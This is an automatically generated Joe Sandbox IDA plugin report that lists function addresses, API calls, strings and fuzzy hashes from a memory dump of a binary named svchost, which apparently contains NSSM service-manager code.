Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_svchost.jbxd

Similarity

API ID: Heap$Free$Process$ErrorLastOpenService_fwprintf$ChangeCloseConfigHandleLocalManager_vfwprintf
String ID: %s: %s$%s: %s$%s\%s: %s$List$SYSTEM\CurrentControlSet\Control\ServiceGroupOrder$groups$set_service_dependencies()
API String ID: 1051873479-3133791794
Opcode ID: 1472673ddb642fb760451205b66f8a7f14b720a8d27ed31555cebdbe2feeab61
Instruction ID: 9c0a7fc0b1366e98588ba43337f49fd2028f4eb401c9540c82854c5db0497d9e
Opcode Fuzzy Hash: 1472673ddb642fb760451205b66f8a7f14b720a8d27ed31555cebdbe2feeab61
Instruction Fuzzy Hash: 41C1D8F1D04301ABD710ABA1DC4AFAB77A8EF44708F14452AF945A72C1F778E94487AE

Function 004010C0 Relevance: 72.2, APIs: 37, Strings: 4, Instructions: 404memoryCOMMON

Download Yara Rule

APIs

__wcsnicmp.LIBCMT ref: 0040111B
GetProcessHeap.KERNEL32(00000000,?), ref: 00401150
HeapAlloc.KERNEL32(00000000), ref: 00401153
GetComputerNameW.KERNEL32 ref: 00401185
GetProcessHeap.KERNEL32(00000000,?), ref: 004011B4
HeapAlloc.KERNEL32(00000000), ref: 004011B7
LsaClose.ADVAPI32(?), ref: 004011F0
LsaLookupNames.ADVAPI32(?,00000001,?,?,?), ref: 0040126B
GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?), ref: 00401275
HeapFree.KERNEL32(00000000,?,?,?,?,?,?), ref: 00401278
LsaClose.ADVAPI32(?), ref: 0040128B
LsaFreeMemory.ADVAPI32(?), ref: 00401299
LsaFreeMemory.ADVAPI32(?), ref: 004012A3
LsaNtStatusToWinError.ADVAPI32(00000000,?,?,?,?,?,?,?,?), ref: 004012A9

Part of subcall function 00401000: LsaOpenPolicy.ADVAPI32(00000000,000F0FFF,000F0FFF,?), ref: 0040102D
Part of subcall function 00401000: LsaNtStatusToWinError.ADVAPI32(00000000), ref: 00401037

Strings

expanded, xrefs: 004011C8
username_sid, xrefs: 004011C3, 004013A4
SID, xrefs: 004013A9
%s\%s, xrefs: 0040121A

Memory Dump Source

Source File: 00000009.00000002.2581252616.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.2581215729.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2581310154.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2581369894.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2581412869.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_svchost.jbxd

Similarity

API ID: Heap$FreeProcess$AllocCloseErrorMemoryStatus$ComputerLookupNameNamesOpenPolicy__wcsnicmp
String ID: %s\%s$SID$expanded$username_sid
API String ID: 1950436716-179756375
Opcode ID: 0f01d14120d1ec3f52388d2865ee54dcbcf4cc9dc7fddb09f4af5f8e8ba633f5
Instruction ID: 8923221f29891c7587102ab13130cbc3c72cae1e0e7c2496b089627ed1adcca3
Opcode Fuzzy Hash: 0f01d14120d1ec3f52388d2865ee54dcbcf4cc9dc7fddb09f4af5f8e8ba633f5
Instruction Fuzzy Hash: 06D1D3B1A043016FD300EB65CD85EAFB3E9EF88308F44492EF545D7351EA78E9458B9A

Function 00411260 Relevance: 47.6, APIs: 24, Strings: 3, Instructions: 307memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008), ref: 0041135B
HeapAlloc.KERNEL32(00000000), ref: 0041135E
GetProcessHeap.KERNEL32(00000000,?), ref: 0041139B
HeapFree.KERNEL32(00000000), ref: 0041139E
GetProcessHeap.KERNEL32(00000000,?), ref: 004113AB
HeapFree.KERNEL32(00000000), ref: 004113AE
GetProcessHeap.KERNEL32(00000000,?), ref: 00411430
HeapAlloc.KERNEL32(00000000), ref: 00411433
GetProcessHeap.KERNEL32(00000000,?), ref: 00411470
HeapFree.KERNEL32(00000000), ref: 00411473
GetProcessHeap.KERNEL32(00000000,?,?), ref: 004114E9
HeapFree.KERNEL32(00000000), ref: 004114EC
GetProcessHeap.KERNEL32(00000000,?,?), ref: 004114F9
HeapFree.KERNEL32(00000000), ref: 004114FC
GetProcessHeap.KERNEL32(00000000,?,?), ref: 00411509
HeapFree.KERNEL32(00000000), ref: 0041150C
GetProcessHeap.KERNEL32(00000000,?,?), ref: 00411519
HeapFree.KERNEL32(00000000), ref: 0041151C
ChangeServiceConfigW.ADVAPI32(?,000000FF,000000FF,000000FF,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0041153C
GetLastError.KERNEL32 ref: 00411546
GetProcessHeap.KERNEL32(00000000,?), ref: 00411576
HeapFree.KERNEL32(00000000), ref: 0041157D
GetProcessHeap.KERNEL32(00000000,?), ref: 00411596
HeapFree.KERNEL32(00000000), ref: 0041159D

Strings

canon, xrefs: 0041136F
native_set_dependongroup, xrefs: 0041136A, 0041143F
dependencies, xrefs: 00411444

Memory Dump Source

Source File: 00000009.00000002.2581252616.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.2581215729.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2581310154.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2581369894.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2581412869.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_svchost.jbxd

Similarity

API ID: Heap$Process$Free$Alloc$ChangeConfigErrorLastService
String ID: canon$dependencies$native_set_dependongroup
API String ID: 1452945198-1240925597
Opcode ID: 2bfb86973befa482fabe00d42bb3fe4171c406064511875981c350d78f657692
Instruction ID: b18a58e69c4f32cef05835414142f752b3cd4a08407a03f402dfde9a93b034f2
Opcode Fuzzy Hash: 2bfb86973befa482fabe00d42bb3fe4171c406064511875981c350d78f657692
Instruction Fuzzy Hash: 829129B19043066BD710AF65CC84EEB73D8EF84354F444A2AFA55D3290E778ED84C7A9

Function 00408D50 Relevance: 44.1, APIs: 24, Strings: 1, Instructions: 325fileCOMMON

Download Yara Rule

APIs

GetFileInformationByHandle.KERNEL32(?,?), ref: 00408D89
IsTextUnicode.ADVAPI32(?,?,00000000), ref: 00408E39
CloseHandle.KERNEL32(?), ref: 00408EA4
MoveFileW.KERNEL32(?,?), ref: 00408EB2

Strings

MoveFile(), xrefs: 00408F0F

Memory Dump Source

Source File: 00000009.00000002.2581252616.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.2581215729.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2581310154.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2581369894.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2581412869.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_svchost.jbxd

Similarity

API ID: FileHandle$CloseInformationMoveTextUnicode
String ID: MoveFile()
API String ID: 2866973295-3582319293
Opcode ID: 15708711689a8bb3d828d14e4bfab1ca7b6999520053ae95ba287ec52d9b1868
Instruction ID: d8a2b6048f09d48243753343ed7bb43d63bee3e823a3270b0cadf41497ef1fc2
Opcode Fuzzy Hash: 15708711689a8bb3d828d14e4bfab1ca7b6999520053ae95ba287ec52d9b1868
Instruction Fuzzy Hash: CEB185B1604301AFD320DF65CD85E6BB7E9EFC8308F00492EF58693291DA74E945CB6A

Function 0040EF10 Relevance: 38.8, APIs: 19, Strings: 3, Instructions: 272COMMON

Download Yara Rule

Strings

%s, xrefs: 0040F137
%s: %s, xrefs: 0040F15A
%s: %s: %s, xrefs: 0040F0CC, 0040F0FA, 0040F207, 0040F237

Memory Dump Source

Source File: 00000009.00000002.2581252616.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.2581215729.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2581310154.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2581369894.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2581412869.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_svchost.jbxd

Similarity

API ID: ConsoleWindow
String ID: %s$%s: %s$%s: %s: %s
API String ID: 2863861424-3854535108
Opcode ID: 62dbc4f8497a765d2b6207e4a47a89f7e005d1b09c3d01c80ec779e24176e9d2
Instruction ID: 763075a4a37bd2d8825689e23daf19d261bde39fceb0a92dd0ece0a9df8372dc
Opcode Fuzzy Hash: 62dbc4f8497a765d2b6207e4a47a89f7e005d1b09c3d01c80ec779e24176e9d2
Instruction Fuzzy Hash: A981DBF6D04200BBE22077719C46BAF725C9B9431DF44093FF906A62C2FA7CD95946AB

Function 0040A580 Relevance: 38.7, APIs: 19, Strings: 3, Instructions: 229processCOMMON

Download Yara Rule

APIs

__snwprintf_s.LIBCMT ref: 0040A5C0

Part of subcall function 00412731: __vsnwprintf_s_l.LIBCMT ref: 00412748

__snwprintf_s.LIBCMT ref: 0040A5DE

Part of subcall function 00405400: RegisterEventSourceW.ADVAPI32(00000000,nssm), ref: 0040540B
Part of subcall function 00405400: ReportEventW.ADVAPI32(00000000,?,00000000), ref: 00405459
Part of subcall function 00405400: DeregisterEventSource.ADVAPI32(00000000), ref: 00405460

OpenProcess.KERNEL32(00100411,00000000,?), ref: 0040A610
__snwprintf_s.LIBCMT ref: 0040A639
GetExitCodeProcess.KERNEL32(00000000,?), ref: 0040A67A
GetLastError.KERNEL32(00000000), ref: 0040A699
CloseHandle.KERNEL32(00000000), ref: 0040A6C2
CloseHandle.KERNEL32(00000000), ref: 0040A6ED
GetLastError.KERNEL32(00000000), ref: 0040A6F7
CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040A723
GetLastError.KERNEL32(00000000,00000002,00000000), ref: 0040A72F
_memset.LIBCMT ref: 0040A760
Process32FirstW.KERNEL32 ref: 0040A776
GetLastError.KERNEL32(00000000), ref: 0040A780
Process32NextW.KERNEL32(00000000,?), ref: 0040A7C2
Process32NextW.KERNEL32(00000000,?), ref: 0040A807
GetLastError.KERNEL32(?,00000000,?,?,00000002,00000000), ref: 0040A816
GetLastError.KERNEL32(00000000,?,00000000,?,?,00000002,00000000), ref: 0040A81F
CloseHandle.KERNEL32(00000000,?,00000000,?,?,00000002,00000000), ref: 0040A83C

Strings

%lu, xrefs: 0040A5AF, 0040A5CD, 0040A628
NSSM, xrefs: 0040A6CF
AppStopMethodSkip, xrefs: 0040A6CA

Memory Dump Source

Source File: 00000009.00000002.2581252616.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.2581215729.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2581310154.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2581369894.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2581412869.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_svchost.jbxd

Similarity

API ID: ErrorLast$CloseEventHandleProcess32__snwprintf_s$NextProcessSource$CodeCreateDeregisterExitFirstOpenRegisterReportSnapshotToolhelp32__vsnwprintf_s_l_memset
String ID: %lu$AppStopMethodSkip$NSSM
API String ID: 876000941-153837258
Opcode ID: 87d6cd8ad363924e11445b902c5b866b416526b6275c1319dbaef4f3e386f7b6
Instruction ID: 9356f86b261df9c84ccaf74e0b1af484dc6ccdd0321f5befb0d5a42ea0511750
Opcode Fuzzy Hash: 87d6cd8ad363924e11445b902c5b866b416526b6275c1319dbaef4f3e386f7b6
Instruction Fuzzy Hash: A061C8F15043007BE220A7519D8AFFB736CDF94708F50892EFA49A21C3F6B89515867B

Function 00411680 Relevance: 38.7, APIs: 20, Strings: 2, Instructions: 219memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,?,?,?,?), ref: 0041171B
HeapFree.KERNEL32(00000000,?,?,?), ref: 00411722
GetProcessHeap.KERNEL32(00000000,?,?,?,?,?), ref: 00411750
GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,?,?,?), ref: 00411790
HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?), ref: 00411793
GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,?,?,?), ref: 004117A0
HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?), ref: 004117A3
HeapAlloc.KERNEL32(00000000,?,?,?,?), ref: 00411753

Part of subcall function 00405470: _vfwprintf.LIBCMT ref: 0040548F
Part of subcall function 00405470: LocalFree.KERNEL32(00000000,?,?,?,00000000,00000000), ref: 00405498

GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,?,?), ref: 00411813
HeapFree.KERNEL32(00000000,?,?,?,?,?,?), ref: 00411816
GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,?,?), ref: 00411823
HeapFree.KERNEL32(00000000,?,?,?,?,?,?), ref: 00411826
GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,?,?), ref: 00411833
HeapFree.KERNEL32(00000000,?,?,?,?,?,?), ref: 00411836
ChangeServiceConfigW.ADVAPI32(?,000000FF,000000FF,000000FF,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0041185A
GetLastError.KERNEL32 ref: 00411864
GetProcessHeap.KERNEL32(00000000,?), ref: 00411895
HeapFree.KERNEL32(00000000), ref: 0041189C
GetProcessHeap.KERNEL32(00000000,?), ref: 004118B5
HeapFree.KERNEL32(00000000), ref: 004118BC

Strings

dependencies, xrefs: 00411764
native_set_dependonservice, xrefs: 0041175F

Memory Dump Source

Source File: 00000009.00000002.2581252616.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.2581215729.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2581310154.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2581369894.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2581412869.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_svchost.jbxd

Similarity

API ID: Heap$FreeProcess$AllocChangeConfigErrorLastLocalService_vfwprintf
String ID: dependencies$native_set_dependonservice
API String ID: 2900453341-2849880886
Opcode ID: eacf11b33cb2cc2d23edf79ce080d1b0cbbaad9b579bfd244ff4f5032ff0d319
Instruction ID: c8f04e43e909d1bf12b9aa294be1e3cdf98767991595af7166a1449a2d8a3fce
Opcode Fuzzy Hash: eacf11b33cb2cc2d23edf79ce080d1b0cbbaad9b579bfd244ff4f5032ff0d319
Instruction Fuzzy Hash: 0E51D5B1A043016BE610EB65DC45FAB73DCEF84714F048629FA68D72E1EB78DC44C66A

Function 00406A20 Relevance: 33.4, APIs: 17, Strings: 2, Instructions: 169memorywindowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00406A39
GetProcessHeap.KERNEL32 ref: 00406A56
HeapAlloc.KERNEL32(00000000), ref: 00406A59
_memset.LIBCMT ref: 00406A74
LocalFree.KERNEL32(00000000,?,?,?,?,?,?,00000000,00000200), ref: 00406AD9
__snwprintf_s.LIBCMT ref: 00406AFC
__snwprintf_s.LIBCMT ref: 00406AB8

Part of subcall function 00412731: __vsnwprintf_s_l.LIBCMT ref: 00412748

GetProcessHeap.KERNEL32(00000000,0000FFFE), ref: 00406B48
HeapAlloc.KERNEL32(00000000), ref: 00406B4B
__snwprintf_s.LIBCMT ref: 00406B81
__snwprintf_s.LIBCMT ref: 00406BA5

Part of subcall function 00405370: GetUserDefaultLangID.KERNEL32(00401059,0000FFFF,00000000,?,?,?,0040547B,40000206,?,00401059,-00000040,40000206,00000000,00000000), ref: 0040537F
Part of subcall function 00405370: FormatMessageW.KERNEL32(00000B00,00000000,0040547B,?,?,?,?,0040547B,40000206,?,00401059,-00000040,40000206,00000000,00000000), ref: 0040539B
Part of subcall function 00405370: FormatMessageW.KERNEL32(00000B00,00000000,0040547B,00000000,00401059,0000FFFF,00000000,?,?,?,?,0040547B,40000206,?,00401059,-00000040), ref: 004053B4
Part of subcall function 00405370: GetProcessHeap.KERNEL32(00000000,00000040,?,?,?,?,0040547B,40000206,?,00401059,-00000040,40000206,00000000,00000000), ref: 004053BD
Part of subcall function 00405370: HeapAlloc.KERNEL32(00000000,?,?,?,?,0040547B,40000206,?,00401059,-00000040,40000206,00000000,00000000), ref: 004053C4
Part of subcall function 00405370: __snwprintf_s.LIBCMT ref: 004053DC

GetOpenFileNameW.COMDLG32(?,00000200), ref: 00406BD6
SendMessageW.USER32(?,0000000C,00000000,?), ref: 00406C03
GetProcessHeap.KERNEL32(00000000,?), ref: 00406C1A
HeapFree.KERNEL32(00000000), ref: 00406C1D
GetProcessHeap.KERNEL32(00000000,?), ref: 00406C2A
HeapFree.KERNEL32(00000000), ref: 00406C2D

Strings

:%s:, xrefs: 00406B74
X, xrefs: 00406A4E

Memory Dump Source

Source File: 00000009.00000002.2581252616.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.2581215729.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2581310154.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2581369894.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2581412869.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_svchost.jbxd

Similarity

API ID: Heap$Process__snwprintf_s$AllocFreeMessage$Format_memset$DefaultFileLangLocalNameOpenSendUser__vsnwprintf_s_l
String ID: :%s:$X
API String ID: 4223584720-3643568712
Opcode ID: 6f6cb0b89cacafe10d1f1f8fd1946d6e639445887778fbb56b134f867ee11a65
Instruction ID: 2fb1f1ec6dd78cf9b56019ed523e1d5e6dfd49e8e4e2ad70138c12666923ebb1
Opcode Fuzzy Hash: 6f6cb0b89cacafe10d1f1f8fd1946d6e639445887778fbb56b134f867ee11a65
Instruction Fuzzy Hash: 725103B1A043016BE610EB24CC45FAB77A8EF84754F140A3DFD55A73C1DB78E914CA9A

Function 004099A0 Relevance: 33.4, APIs: 15, Strings: 4, Instructions: 126memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00405470: _vfwprintf.LIBCMT ref: 0040548F
Part of subcall function 00405470: LocalFree.KERNEL32(00000000,?,?,?,00000000,00000000), ref: 00405498

_memset.LIBCMT ref: 004099BD
GetProcessHeap.KERNEL32 ref: 004099E2
HeapAlloc.KERNEL32(00000000), ref: 004099EB
GetModuleFileNameW.KERNEL32(00000000,00000000,00007FFF), ref: 00409A28
GetProcessHeap.KERNEL32(00000008,0000FFFE), ref: 00409A35
HeapAlloc.KERNEL32(00000000), ref: 00409A38
GetProcessHeap.KERNEL32(00000000,?), ref: 00409A46
HeapFree.KERNEL32(00000000), ref: 00409A49
GetCommandLineW.KERNEL32 ref: 00409A5B
__snwprintf_s.LIBCMT ref: 00409A6F

Part of subcall function 00412731: __vsnwprintf_s_l.LIBCMT ref: 00412748

ShellExecuteExW.SHELL32 ref: 00409AD9
GetProcessHeap.KERNEL32(00000000,?), ref: 00409AED
HeapFree.KERNEL32(00000000), ref: 00409AF6
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00409AFB
HeapFree.KERNEL32(00000000), ref: 00409AFE

Strings

GetCommandLine(), xrefs: 00409A54
<, xrefs: 004099D2
GetModuleFileName(), xrefs: 004099FA
elevate(), xrefs: 004099F5, 00409A4F

Memory Dump Source

Source File: 00000009.00000002.2581252616.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.2581215729.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2581310154.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2581369894.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2581412869.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_svchost.jbxd

Similarity

API ID: Heap$Process$Free$Alloc$CommandExecuteFileLineLocalModuleNameShell__snwprintf_s__vsnwprintf_s_l_memset_vfwprintf
String ID: <$GetCommandLine()$GetModuleFileName()$elevate()
API String ID: 973368859-4193039769
Opcode ID: 900e8c87ca2aa9aec742fd558df0281ba4947d5c9c9fdbed743180e08cd3c412
Instruction ID: 7ae2c759de92c54c39a002a946b74eb1e22cb2beefd2f70ccc6c30d9fe699ef8
Opcode Fuzzy Hash: 900e8c87ca2aa9aec742fd558df0281ba4947d5c9c9fdbed743180e08cd3c412
Instruction Fuzzy Hash: 673128F1E043027AD310ABA5CC46FA77798EF84704F00452AF945E72C1DBBCE9448BA9

Function 004017F0 Relevance: 28.2, APIs: 15, Strings: 1, Instructions: 188COMMON

Download Yara Rule

Strings

SeServiceLogonRight, xrefs: 00401870

Memory Dump Source

Source File: 00000009.00000002.2581252616.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.2581215729.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2581310154.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2581369894.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2581412869.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_svchost.jbxd

Similarity

API ID:
String ID: SeServiceLogonRight
API String ID: 0-347471591
Opcode ID: d1ec01c29beff1dc2b7cf4a31634801e6b38091671ebd8c69d5d4f8db8eefe16
Instruction ID: 1588cd9aa28459d6f698114f179f5034525e64d227a869bba66d549dab2bd090
Opcode Fuzzy Hash: d1ec01c29beff1dc2b7cf4a31634801e6b38091671ebd8c69d5d4f8db8eefe16
Instruction Fuzzy Hash: D751D9F29003016BC210FB659C82A9F73A9EFC4758F44493EF845D3262E63CDA55C7AA

Function 00410BE0 Relevance: 28.2, APIs: 13, Strings: 3, Instructions: 175registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.ADVAPI32 ref: 00410C19

Strings

setting_get_affinity, xrefs: 00410C74
All, xrefs: 00410C24
affinity, xrefs: 00410C79

Memory Dump Source

Source File: 00000009.00000002.2581252616.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.2581215729.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2581310154.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2581369894.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2581412869.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_svchost.jbxd

Similarity

API ID: QueryValue
String ID: All$affinity$setting_get_affinity
API String ID: 3660427363-3501811323
Opcode ID: aadf3678ba3ec564ff7923484b1f3c659c44b9ba2d0e62d742e643e475440171
Instruction ID: 39c13d5f00e9b419edd27a44e9b0f75dfecbdf5c9278ee4873767282b9cc75a7
Opcode Fuzzy Hash: aadf3678ba3ec564ff7923484b1f3c659c44b9ba2d0e62d742e643e475440171
Instruction Fuzzy Hash: 7041C9B1B042007BE600A779DC45FAF77DCEFC4729F840A5AF558D22D1D6B8DC848A66

Function 00406C40 Relevance: 27.2, APIs: 18, Instructions: 213COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2581252616.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.2581215729.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2581310154.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2581369894.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2581412869.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1b78011fbee3aa40aefb94b04e9307e1ddbd925d910803d0c7f55a23a13cb692
Instruction ID: 4a1410ef1443eea10fe89477afcc143de1e533fa6ee3b316fa2d910530bd4db7
Opcode Fuzzy Hash: 1b78011fbee3aa40aefb94b04e9307e1ddbd925d910803d0c7f55a23a13cb692
Instruction Fuzzy Hash: 4661DCB1A84302BBE101A7509C06FFB7398EB94B44F01443AF7527A0C2DBBC56558BAF

Function 0040D990 Relevance: 27.1, APIs: 18, Instructions: 98memoryserviceCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,?,?,771AF380,00000000,004065B0,?,?,00000030,C00003EB,environment,install()), ref: 0040D9B8
HeapFree.KERNEL32(00000000), ref: 0040D9BB
GetProcessHeap.KERNEL32(00000000,?,?,771AF380,00000000,004065B0,?,?,00000030,C00003EB,environment,install()), ref: 0040D9E3
HeapFree.KERNEL32(00000000), ref: 0040D9E6
GetProcessHeap.KERNEL32(00000000,?,?,771AF380,00000000,004065B0,?,?,00000030,C00003EB,environment,install()), ref: 0040D9F5
HeapFree.KERNEL32(00000000), ref: 0040D9F8
GetProcessHeap.KERNEL32(00000000,?,?,771AF380,00000000,004065B0,?,?,00000030,C00003EB,environment,install()), ref: 0040DA07
HeapFree.KERNEL32(00000000), ref: 0040DA0A
GetProcessHeap.KERNEL32(00000000,?,?,771AF380,00000000,004065B0,?,?,00000030,C00003EB,environment,install()), ref: 0040DA19
HeapFree.KERNEL32(00000000), ref: 0040DA1C
CloseServiceHandle.ADVAPI32(?,?,771AF380,00000000,004065B0,?,?,00000030,C00003EB,environment,install()), ref: 0040DA29
CloseHandle.KERNEL32(?,00000000,?,771AF380,00000000,004065B0,?,?,00000030,C00003EB,environment,install()), ref: 0040DA41
UnregisterWait.KERNEL32(?), ref: 0040DA4E
DeleteCriticalSection.KERNEL32(?,00000000,?,771AF380,00000000,004065B0,?,?,00000030,C00003EB,environment,install()), ref: 0040DA64
CloseHandle.KERNEL32(?,00000000,?,771AF380,00000000,004065B0,?,?,00000030,C00003EB,environment,install()), ref: 0040DA75
FreeEnvironmentStringsW.KERNEL32(?,?,771AF380,00000000,004065B0,?,?,00000030,C00003EB,environment,install()), ref: 0040DA83
GetProcessHeap.KERNEL32(00000000,?,?,771AF380,00000000,004065B0,?,?,00000030,C00003EB,environment,install()), ref: 0040DA8C
HeapFree.KERNEL32(00000000), ref: 0040DA8F

Memory Dump Source

Source File: 00000009.00000002.2581252616.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.2581215729.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2581310154.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2581369894.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2581412869.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_svchost.jbxd

Similarity

API ID: Heap$Free$Process$CloseHandle$CriticalDeleteEnvironmentSectionServiceStringsUnregisterWait
String ID:
API String ID: 223489879-0
Opcode ID: 115bcf30406b6ff842ec37e1375dc7df3e087b6a23b02530f15371c741b9abf6
Instruction ID: 77dd6ce9f9945231fd51557c9ffd4fac1d491a87d3cf4fd6406c7136dc2c8fa9
Opcode Fuzzy Hash: 115bcf30406b6ff842ec37e1375dc7df3e087b6a23b02530f15371c741b9abf6
Instruction Fuzzy Hash: 5E3112F1F04701ABE7209BB6DC45FA7B7DCAF44745F054929BA59E3280CA78EC048A38

Function 0040D520 Relevance: 26.4, APIs: 13, Strings: 2, Instructions: 143memoryCOMMON

Download Yara Rule

APIs

QueryServiceConfig2W.ADVAPI32(00000000,00000001,00000000,00000000,00003FFF,00000000,00008418,00000402), ref: 0040D547
GetLastError.KERNEL32 ref: 0040D549
GetProcessHeap.KERNEL32(00000000,00003FFF,00000000,00000000), ref: 0040D567
HeapAlloc.KERNEL32(00000000), ref: 0040D56A

Strings

SERVICE_CONFIG_DESCRIPTION, xrefs: 0040D57B, 0040D629, 0040D65E
get_service_description(), xrefs: 0040D576

Memory Dump Source

Source File: 00000009.00000002.2581252616.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.2581215729.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
